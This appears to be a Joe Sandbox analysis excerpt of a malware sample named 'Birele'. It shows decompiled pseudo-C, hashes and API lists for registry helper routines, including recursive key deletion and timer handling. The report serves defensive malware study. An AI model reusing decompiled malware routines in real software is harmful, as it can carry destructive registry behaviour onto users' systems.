                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnum$CreateInfoOpenQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 957127650-0
                                                                                                          • Opcode ID: 17ab5dfaac206068ac71786cf3f6c4fbbebf4ef4bbcca21094b90d8354c13603
                                                                                                          • Instruction ID: 62ce5320b14838b23070538cb02f8894d0d0bf477f9eea7edafbdfa9764f96ce
                                                                                                          • Opcode Fuzzy Hash: 17ab5dfaac206068ac71786cf3f6c4fbbebf4ef4bbcca21094b90d8354c13603
                                                                                                          • Instruction Fuzzy Hash: F851C935A00A08DFCB01DF99C985ADEBBF9EB48714F518566F804E7351D738AE41CB98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 00401978: RtlInitializeCriticalSection.NTDLL(004195C4), ref: 0040198E
                                                                                                            • Part of subcall function 00401978: RtlEnterCriticalSection.NTDLL(004195C4), ref: 004019A1
                                                                                                            • Part of subcall function 00401978: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401A2E), ref: 004019CB
                                                                                                            • Part of subcall function 00401978: RtlLeaveCriticalSection.NTDLL(004195C4), ref: 00401A28
                                                                                                          • RtlEnterCriticalSection.NTDLL(004195C4), ref: 004020AF
                                                                                                          • RtlLeaveCriticalSection.NTDLL(004195C4), ref: 004021DA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                          • String ID:
                                                                                                          • API String ID: 2227675388-0
                                                                                                          • Opcode ID: 3435c0592be33671a75e925e408d813020efbefca6112705338a3c4ab091e6d4
                                                                                                          • Instruction ID: 6444be712089267c6e5c34b626e2a441286cb6b47e6f2a00395febc31b3f7a00
                                                                                                          • Opcode Fuzzy Hash: 3435c0592be33671a75e925e408d813020efbefca6112705338a3c4ab091e6d4
                                                                                                          • Instruction Fuzzy Hash: 4E4103B2A003009FDB15CF29DDA56AAB7A1EB94318B14817FD505EB3E1D7789D41CB1C
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 72%
                                                                                                          			E004153F0(intOrPtr __eax, void* __ebx, void* __edx) {
                                                                                                          				intOrPtr _v4;
                                                                                                          				intOrPtr _v8;
                                                                                                          				char _v9;
                                                                                                          				int _v12;
                                                                                                          				intOrPtr _v13;
                                                                                                          				char _v16;
                                                                                                          				char _v20;
                                                                                                          				char _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* _v32;
                                                                                                          				intOrPtr _v56;
                                                                                                          				char _v60;
                                                                                                          				char _v64;
                                                                                                          				intOrPtr _v117;
                                                                                                          				void* _t53;
                                                                                                          				char* _t55;
                                                                                                          				long _t58;
                                                                                                          				long _t73;
                                                                                                          				long _t82;
                                                                                                          				void* _t91;
                                                                                                          				int _t94;
                                                                                                          				intOrPtr _t107;
                                                                                                          				intOrPtr _t111;
                                                                                                          				void* _t117;
                                                                                                          				void* _t119;
                                                                                                          				void* _t120;
                                                                                                          				intOrPtr _t121;
                                                                                                          
                                                                                                          				_pop(_t120);
                                                                                                          				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                                                          				_v117 = _v117 + __edx;
                                                                                                          				_t119 = _t120;
                                                                                                          				_t121 = _t120 + 0xffffffc4;
                                                                                                          				_push(__ebx);
                                                                                                          				_v60 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				_t91 = __edx;
                                                                                                          				_v4 = __eax;
                                                                                                          				_push(_t119);
                                                                                                          				_push(0x41555d);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t121;
                                                                                                          				E00403A44( &_v16, __edx);
                                                                                                          				_v9 = E00415080(_v16);
                                                                                                          				if(_v9 == 0) {
                                                                                                          					E00403ED8( &_v20, 1, 1);
                                                                                                          				}
                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                          				_t53 = E00415774(_v8, _t91, _t91, _t117); // executed
                                                                                                          				_v32 = _t53;
                                                                                                          				_t124 = _v32;
                                                                                                          				if(_v32 == 0) {
                                                                                                          					_t55 = E00403E38(_v20);
                                                                                                          					_t58 = RegDeleteKeyA(E004151DC(_v8, _v13), _t55); // executed
                                                                                                          					_t58 = 0;
                                                                                                          					_pop(_t107);
                                                                                                          					 *[fs:eax] = _t107;
                                                                                                          					_push(E00415564);
                                                                                                          					E004039AC( &_v64);
                                                                                                          					return E004039D0( &_v24, 2);
                                                                                                          				} else {
                                                                                                          					_push(_t119);
                                                                                                          					_push(0x415514);
                                                                                                          					_push( *[fs:eax]);
                                                                                                          					 *[fs:eax] = _t121;
                                                                                                          					E004151F0(_v8, _v32);
                                                                                                          					if(E0041558C(_v8,  &_v60, _t124) != 0) {
                                                                                                          						E00403A9C( &_v24, _v56 + 1, 0);
                                                                                                          						_t94 = _v60 - 1;
                                                                                                          						if(_t94 >= 0) {
                                                                                                          							do {
                                                                                                          								_v12 = _v56 + 1;
                                                                                                          								_t82 = RegEnumKeyExA(_v32, _t94, E00403E38(_v24),  &_v12, 0, 0, 0, 0); // executed
                                                                                                          								if(_t82 == 0) {
                                                                                                          									E00403BA4( &_v64, E00403E38(_v24));
                                                                                                          									L1(); // executed
                                                                                                          								}
                                                                                                          								_t94 = _t94 - 1;
                                                                                                          							} while (_t94 != 0xffffffff);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_pop(_t111);
                                                                                                          					 *[fs:eax] = _t111;
                                                                                                          					_push(0x41551b);
                                                                                                          					E004151F0(_v8, _v28);
                                                                                                          					_t73 = RegCloseKey(_v32); // executed
                                                                                                          					return _t73;
                                                                                                          				}
                                                                                                          			}






























                                                                                                          0x004153f0
                                                                                                          0x004153f1
                                                                                                          0x004153f3
                                                                                                          0x004153f5
                                                                                                          0x004153f7
                                                                                                          0x004153fa
                                                                                                          0x004153fd
                                                                                                          0x00415400
                                                                                                          0x00415403
                                                                                                          0x00415406
                                                                                                          0x00415408
                                                                                                          0x0041540d
                                                                                                          0x0041540e
                                                                                                          0x00415413
                                                                                                          0x00415416
                                                                                                          0x0041541e
                                                                                                          0x0041542b
                                                                                                          0x00415432
                                                                                                          0x00415441
                                                                                                          0x00415441
                                                                                                          0x0041544c
                                                                                                          0x00415454
                                                                                                          0x00415459
                                                                                                          0x0041545c
                                                                                                          0x00415460
                                                                                                          0x0041551e
                                                                                                          0x00415530
                                                                                                          0x0041553a
                                                                                                          0x0041553c
                                                                                                          0x0041553f
                                                                                                          0x00415542
                                                                                                          0x0041554a
                                                                                                          0x0041555c
                                                                                                          0x00415466
                                                                                                          0x00415468
                                                                                                          0x00415469
                                                                                                          0x0041546e
                                                                                                          0x00415471
                                                                                                          0x0041547a
                                                                                                          0x0041548c
                                                                                                          0x00415497
                                                                                                          0x0041549f
                                                                                                          0x004154a3
                                                                                                          0x004154a5
                                                                                                          0x004154a9
                                                                                                          0x004154c6
                                                                                                          0x004154cd
                                                                                                          0x004154dc
                                                                                                          0x004154e7
                                                                                                          0x004154e7
                                                                                                          0x004154ec
                                                                                                          0x004154ed
                                                                                                          0x004154a5
                                                                                                          0x004154a3
                                                                                                          0x004154f4
                                                                                                          0x004154f7
                                                                                                          0x004154fa
                                                                                                          0x00415505
                                                                                                          0x0041550e
                                                                                                          0x00415513
                                                                                                          0x00415513

                                                                                                          APIs
                                                                                                          • RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00415514,?,00000000,0041555D), ref: 004154C6
                                                                                                          • RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2818636725-0
                                                                                                          • Opcode ID: 30c0c92bbd527816d49e7bbb4ac1790377772c14e99304b7a86efbab6acd3d06
                                                                                                          • Instruction ID: f9fab664c970e0139ba174afad949d8553416a2effaa568708381859235bd353
                                                                                                          • Opcode Fuzzy Hash: 30c0c92bbd527816d49e7bbb4ac1790377772c14e99304b7a86efbab6acd3d06
                                                                                                          • Instruction Fuzzy Hash: F7314170E04648EFDB01DFA9C882BEEBBB5EB48314F50456AF411F7391D6389E418B58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 66%
                                                                                                          			E004152D0(void* __eax, void* __ebx, char __ecx, void* __edx, void* __esi) {
                                                                                                          				char _v5;
                                                                                                          				char _v6;
                                                                                                          				void* _v12;
                                                                                                          				char _v16;
                                                                                                          				int _v20;
                                                                                                          				char* _t40;
                                                                                                          				signed int _t43;
                                                                                                          				char* _t55;
                                                                                                          				signed char _t63;
                                                                                                          				intOrPtr _t72;
                                                                                                          				void* _t78;
                                                                                                          				void* _t81;
                                                                                                          
                                                                                                          				_v16 = 0;
                                                                                                          				_v5 = __ecx;
                                                                                                          				_t78 = __eax;
                                                                                                          				_push(_t81);
                                                                                                          				_push(0x4153d5);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t81 + 0xfffffff0;
                                                                                                          				E00403A44( &_v16, __edx);
                                                                                                          				_t63 = E00415080(_v16);
                                                                                                          				if(_t63 == 0) {
                                                                                                          					E00403ED8( &_v16, 1, 1);
                                                                                                          				}
                                                                                                          				_v12 = 0;
                                                                                                          				if(_v5 == 0 || _v16 == 0) {
                                                                                                          					_t40 = E00403E38(_v16);
                                                                                                          					_t43 = RegOpenKeyExA(E004151DC(_t78, _t63), _t40, 0,  *(_t78 + 0x18),  &_v12);
                                                                                                          					_v6 = _t43 == 0;
                                                                                                          				} else {
                                                                                                          					_t55 = E00403E38(_v16);
                                                                                                          					_t43 = RegCreateKeyExA(E004151DC(_t78, _t63), _t55, 0, 0, 0,  *(_t78 + 0x18), 0,  &_v12,  &_v20); // executed
                                                                                                          					_v6 = _t43 == 0;
                                                                                                          				}
                                                                                                          				if(_v6 != 0) {
                                                                                                          					if(((_t43 & 0xffffff00 |  *((intOrPtr*)(_t78 + 4)) != 0x00000000) & _t63) != 0) {
                                                                                                          						_push( *((intOrPtr*)(_t78 + 0x10)));
                                                                                                          						_push(E004153F0);
                                                                                                          						_push(_v16);
                                                                                                          						E00403D08();
                                                                                                          					}
                                                                                                          					E004151B8(_t78, _v16, _v12);
                                                                                                          				}
                                                                                                          				_pop(_t72);
                                                                                                          				 *[fs:eax] = _t72;
                                                                                                          				_push(E004153DC);
                                                                                                          				return E004039AC( &_v16);
                                                                                                          			}















                                                                                                          0x004152da
                                                                                                          0x004152dd
                                                                                                          0x004152e2
                                                                                                          0x004152e6
                                                                                                          0x004152e7
                                                                                                          0x004152ec
                                                                                                          0x004152ef
                                                                                                          0x004152f7
                                                                                                          0x00415304
                                                                                                          0x00415308
                                                                                                          0x00415317
                                                                                                          0x00415317
                                                                                                          0x0041531e
                                                                                                          0x00415325
                                                                                                          0x0041533a
                                                                                                          0x0041534a
                                                                                                          0x00415351
                                                                                                          0x00415357
                                                                                                          0x0041536e
                                                                                                          0x0041537e
                                                                                                          0x00415385
                                                                                                          0x00415385
                                                                                                          0x0041538d
                                                                                                          0x00415398
                                                                                                          0x0041539a
                                                                                                          0x0041539d
                                                                                                          0x004153a2
                                                                                                          0x004153ad
                                                                                                          0x004153ad
                                                                                                          0x004153ba
                                                                                                          0x004153ba
                                                                                                          0x004153c1
                                                                                                          0x004153c4
                                                                                                          0x004153c7
                                                                                                          0x004153d4

                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004153D5), ref: 0041534A
                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,004153D5), ref: 0041537E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 436179556-0
                                                                                                          • Opcode ID: 90c648b1bc57d283d89d203316200a22ed9f3b3a5543ba33884ccc30502b56b3
                                                                                                          • Instruction ID: 0fc639a14f7caba3a9c303f525382ba161dd617fc893ef9164d67049e1a84380
                                                                                                          • Opcode Fuzzy Hash: 90c648b1bc57d283d89d203316200a22ed9f3b3a5543ba33884ccc30502b56b3
                                                                                                          • Instruction Fuzzy Hash: A3318131E00648BFDB11EAA5C841BDFBBBCAF44704F54857AB810E3281D7B99A458B48
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E00415D0C(intOrPtr __eax, void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* __ebx;
                                                                                                          				void* __esi;
                                                                                                          				void* __ebp;
                                                                                                          				void* _t21;
                                                                                                          				void* _t28;
                                                                                                          				void* _t43;
                                                                                                          				intOrPtr _t58;
                                                                                                          				intOrPtr _t61;
                                                                                                          				void* _t65;
                                                                                                          				void* _t68;
                                                                                                          				void* _t70;
                                                                                                          				intOrPtr _t71;
                                                                                                          
                                                                                                          				_t63 = __edi;
                                                                                                          				_t68 = _t70;
                                                                                                          				_t71 = _t70 + 0xfffffff4;
                                                                                                          				_t65 = __ecx;
                                                                                                          				_t43 = __edx;
                                                                                                          				_v8 = __eax;
                                                                                                          				_t21 = E0041580C(_v8, __edx, __edx, __eflags); // executed
                                                                                                          				_t74 = _t21;
                                                                                                          				if(_t21 == 0) {
                                                                                                          					L10:
                                                                                                          					return _t21;
                                                                                                          				} else {
                                                                                                          					_t21 = E0041580C(_v8, __edx, _t65, _t74); // executed
                                                                                                          					if(_t21 != 0) {
                                                                                                          						goto L10;
                                                                                                          					} else {
                                                                                                          						_t21 = E00415774(_v8, __edx, __edx, _t65); // executed
                                                                                                          						_v12 = _t21;
                                                                                                          						if(_v12 == 0) {
                                                                                                          							goto L10;
                                                                                                          						} else {
                                                                                                          							_push(_t68);
                                                                                                          							_push(0x415dee);
                                                                                                          							_push( *[fs:eax]);
                                                                                                          							 *[fs:eax] = _t71;
                                                                                                          							E004151F4(_v8, __edx, _t65, __edi, _t65); // executed
                                                                                                          							_t28 = E00415774(_v8, __edx, _t65, _t65); // executed
                                                                                                          							_v16 = _t28;
                                                                                                          							_t77 = _v16;
                                                                                                          							if(_v16 == 0) {
                                                                                                          								__eflags = 0;
                                                                                                          								_pop(_t58);
                                                                                                          								 *[fs:eax] = _t58;
                                                                                                          								_push(0x415df5);
                                                                                                          								return RegCloseKey(_v12);
                                                                                                          							} else {
                                                                                                          								_push(_t68);
                                                                                                          								_push(0x415dd0);
                                                                                                          								_push( *[fs:eax]);
                                                                                                          								 *[fs:eax] = _t71;
                                                                                                          								E00415998(_v12, __edx, _v16, __edi, _t65, _t77, _t68); // executed
                                                                                                          								E00415AC0(_v12, _t43, _v16, _t63, _t65, _t77, _t68); // executed
                                                                                                          								if(_a4 != 0) {
                                                                                                          									E004153F4(_v8, _t43, _t43, _t65); // executed
                                                                                                          								}
                                                                                                          								_pop(_t61);
                                                                                                          								 *[fs:eax] = _t61;
                                                                                                          								_push(0x415dd7);
                                                                                                          								return RegCloseKey(_v16);
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}


















                                                                                                          0x00415d0c
                                                                                                          0x00415d0d
                                                                                                          0x00415d0f
                                                                                                          0x00415d14
                                                                                                          0x00415d16
                                                                                                          0x00415d18
                                                                                                          0x00415d20
                                                                                                          0x00415d25
                                                                                                          0x00415d27
                                                                                                          0x00415df5
                                                                                                          0x00415dfa
                                                                                                          0x00415d2d
                                                                                                          0x00415d32
                                                                                                          0x00415d39
                                                                                                          0x00000000
                                                                                                          0x00415d3f
                                                                                                          0x00415d44
                                                                                                          0x00415d49
                                                                                                          0x00415d50
                                                                                                          0x00000000
                                                                                                          0x00415d56
                                                                                                          0x00415d58
                                                                                                          0x00415d59
                                                                                                          0x00415d5e
                                                                                                          0x00415d61
                                                                                                          0x00415d69
                                                                                                          0x00415d73
                                                                                                          0x00415d78
                                                                                                          0x00415d7b
                                                                                                          0x00415d7f
                                                                                                          0x00415dd7
                                                                                                          0x00415dd9
                                                                                                          0x00415ddc
                                                                                                          0x00415ddf
                                                                                                          0x00415ded
                                                                                                          0x00415d81
                                                                                                          0x00415d83
                                                                                                          0x00415d84
                                                                                                          0x00415d89
                                                                                                          0x00415d8c
                                                                                                          0x00415d96
                                                                                                          0x00415da3
                                                                                                          0x00415dad
                                                                                                          0x00415db4
                                                                                                          0x00415db4
                                                                                                          0x00415dbb
                                                                                                          0x00415dbe
                                                                                                          0x00415dc1
                                                                                                          0x00415dcf
                                                                                                          0x00415dcf
                                                                                                          0x00415d7f
                                                                                                          0x00415d50
                                                                                                          0x00415d39

                                                                                                          APIs
                                                                                                            • Part of subcall function 0041580C: RegCloseKey.ADVAPI32(00000000,00000000,00415868), ref: 00415846
                                                                                                            • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                            • Part of subcall function 004151F4: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041526B
                                                                                                            • Part of subcall function 004151F4: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041527F
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00415DF5), ref: 00415DE8
                                                                                                            • Part of subcall function 00415998: RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415A8A,?,00000000,00415AAF), ref: 00415A3D
                                                                                                            • Part of subcall function 00415AC0: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415CD7,?,00000000,00415D01), ref: 00415B6F
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00415DD7,00000000,00415DEE), ref: 00415DCA
                                                                                                            • Part of subcall function 004153F4: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00415514,?,00000000,0041555D), ref: 004154C6
                                                                                                            • Part of subcall function 004153F4: RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$Enum$CreateOpenValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3109560722-0
                                                                                                          • Opcode ID: f1600ae6bc6df724651c07be2e56834804ec54ba6a16370a75e1da82c29a70a3
                                                                                                          • Instruction ID: 53f0292dbd8e348c2a6461f8a0b9a71041dcc7f1d42b1da0b48438f1688e31d7
                                                                                                          • Opcode Fuzzy Hash: f1600ae6bc6df724651c07be2e56834804ec54ba6a16370a75e1da82c29a70a3
                                                                                                          • Instruction Fuzzy Hash: E0217430A00A48EFDB01DF59D846ADEB7A9EB89714FA184B7E400D7251DA789D81CB58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 76%
                                                                                                          			E004151F4(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                          				void* _v8;
                                                                                                          				char _v12;
                                                                                                          				int _v16;
                                                                                                          				char _v20;
                                                                                                          				char _v24;
                                                                                                          				char* _t26;
                                                                                                          				signed int _t29;
                                                                                                          				intOrPtr _t45;
                                                                                                          				intOrPtr _t53;
                                                                                                          				char _t56;
                                                                                                          				void* _t58;
                                                                                                          				void* _t61;
                                                                                                          				signed int _t64;
                                                                                                          
                                                                                                          				_v12 = 0;
                                                                                                          				_t56 = __edx;
                                                                                                          				_t58 = __eax;
                                                                                                          				_push(_t61);
                                                                                                          				_push(0x4152c0);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t61 + 0xffffffec;
                                                                                                          				_v8 = 0;
                                                                                                          				E00403A44( &_v12, __edx);
                                                                                                          				_t42 = E00415080(_v12);
                                                                                                          				if(_t22 == 0) {
                                                                                                          					E00403ED8( &_v12, 1, 1);
                                                                                                          				}
                                                                                                          				_t26 = E00403E38(_v12);
                                                                                                          				_t29 = RegCreateKeyExA(E004151DC(_t58, _t42), _t26, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v16); // executed
                                                                                                          				_t64 = _t29;
                                                                                                          				_t43 = _t29 & 0xffffff00 | _t64 == 0x00000000;
                                                                                                          				if((_t29 & 0xffffff00 | _t64 == 0x00000000) == 0) {
                                                                                                          					_v24 = _t56;
                                                                                                          					_v20 = 0xb;
                                                                                                          					_t45 =  *0x418530; // 0x4119c4
                                                                                                          					E0040CDD0(_t43, _t45, 1, _t56, _t58, 0,  &_v24);
                                                                                                          					E0040340C();
                                                                                                          				} else {
                                                                                                          					RegCloseKey(_v8); // executed
                                                                                                          				}
                                                                                                          				_pop(_t53);
                                                                                                          				 *[fs:eax] = _t53;
                                                                                                          				_push(E004152C7);
                                                                                                          				return E004039AC( &_v12);
                                                                                                          			}
















                                                                                                          0x004151ff
                                                                                                          0x00415202
                                                                                                          0x00415204
                                                                                                          0x00415208
                                                                                                          0x00415209
                                                                                                          0x0041520e
                                                                                                          0x00415211
                                                                                                          0x00415216
                                                                                                          0x0041521e
                                                                                                          0x0041522b
                                                                                                          0x0041522f
                                                                                                          0x0041523e
                                                                                                          0x0041523e
                                                                                                          0x0041525b
                                                                                                          0x0041526b
                                                                                                          0x00415270
                                                                                                          0x00415275
                                                                                                          0x00415279
                                                                                                          0x00415286
                                                                                                          0x00415289
                                                                                                          0x00415293
                                                                                                          0x004152a0
                                                                                                          0x004152a5
                                                                                                          0x0041527b
                                                                                                          0x0041527f
                                                                                                          0x0041527f
                                                                                                          0x004152ac
                                                                                                          0x004152af
                                                                                                          0x004152b2
                                                                                                          0x004152bf

                                                                                                          APIs
                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041526B
                                                                                                          • RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041527F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2932200918-0
                                                                                                          • Opcode ID: 9c21d2041d08c01a8f705047545dd92b847b46b9f2254d498b3837aee35c0b92
                                                                                                          • Instruction ID: 88a55942ac6acbeff302fb8522e327191725e073226085f62b7fc5a3a3ec0e0d
                                                                                                          • Opcode Fuzzy Hash: 9c21d2041d08c01a8f705047545dd92b847b46b9f2254d498b3837aee35c0b92
                                                                                                          • Instruction Fuzzy Hash: 53216F31B40608AFD711EBA5CC51BEF7BAC9B88704F50057AF904E72C2DA79AA418A59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 89%
                                                                                                          			E00408088(int __eax, char __edx) {
                                                                                                          				void* _t15;
                                                                                                          				intOrPtr _t16;
                                                                                                          				intOrPtr _t19;
                                                                                                          				int _t23;
                                                                                                          				void* _t24;
                                                                                                          				intOrPtr _t28;
                                                                                                          
                                                                                                          				_t15 = _t24;
                                                                                                          				_t25 = __eax;
                                                                                                          				if( *((intOrPtr*)(__eax + 0x1c)) == __edx) {
                                                                                                          					return _t15;
                                                                                                          				} else {
                                                                                                          					 *((char*)(__eax + 0x1c)) = __edx;
                                                                                                          					_t36 = __edx;
                                                                                                          					if(__edx == 0) {
                                                                                                          						__eflags = 0;
                                                                                                          						_t11 = __eax + 0x18;
                                                                                                          						 *_t11 = 0;
                                                                                                          						asm("jecxz 0x11");
                                                                                                          						_t16 =  *0x419900; // 0x20a3628
                                                                                                          						_t13 = _t16 + 0x1c; // 0x303ba
                                                                                                          						return KillTimer( *_t13,  *_t11);
                                                                                                          					}
                                                                                                          					_t28 =  *0x419900; // 0x20a3628
                                                                                                          					asm("loop 0x22");
                                                                                                          					_t19 = E00406EBC(0, _t28 + 2, 0x41811c, _t36, 0);
                                                                                                          					 *0x419900 = _t19;
                                                                                                          					 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                                                                          					 *(_t19 + 0x36) =  *(_t19 + 0x36) | 0x00000008;
                                                                                                          					_t23 = SetTimer(E004083E0(_t19), _t25,  *(_t25 + 0x1d), E0040804C); // executed
                                                                                                          					 *(_t25 + 0x18) = _t23;
                                                                                                          					return _t23;
                                                                                                          				}
                                                                                                          			}









                                                                                                          0x00408089
                                                                                                          0x00408089
                                                                                                          0x0040808d
                                                                                                          0x004080f0
                                                                                                          0x0040808f
                                                                                                          0x0040808f
                                                                                                          0x00408092
                                                                                                          0x00408094
                                                                                                          0x004080d9
                                                                                                          0x004080db
                                                                                                          0x004080db
                                                                                                          0x004080de
                                                                                                          0x004080e1
                                                                                                          0x004080e7
                                                                                                          0x00000000
                                                                                                          0x004080ea
                                                                                                          0x00408096
                                                                                                          0x0040809d
                                                                                                          0x004080a8
                                                                                                          0x004080ad
                                                                                                          0x004080b3
                                                                                                          0x004080ba
                                                                                                          0x004080cf
                                                                                                          0x004080d4
                                                                                                          0x004080d8
                                                                                                          0x004080d8

                                                                                                          APIs
                                                                                                          • SetTimer.USER32(00000000,?,?,Function_0000804C), ref: 004080CF
                                                                                                          • KillTimer.USER32(000303BA,00000000,?,0040806C), ref: 004080EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Timer$Kill
                                                                                                          • String ID:
                                                                                                          • API String ID: 3307318486-0
                                                                                                          • Opcode ID: 4d5916390310af83fd2e008a8594d6072cea37795669da6ee82292d551570266
                                                                                                          • Instruction ID: ea5ea7dca1dedb31b910899b8a9cd09f73beb78ae046967fbe0a237be4c5d105
                                                                                                          • Opcode Fuzzy Hash: 4d5916390310af83fd2e008a8594d6072cea37795669da6ee82292d551570266
                                                                                                          • Instruction Fuzzy Hash: 97F062F0109201AEDB1ADF71D9D29173A58AB00304B1580BEA4819F2D7CF7ED829DB9C
                                                                                                          Uniqueness

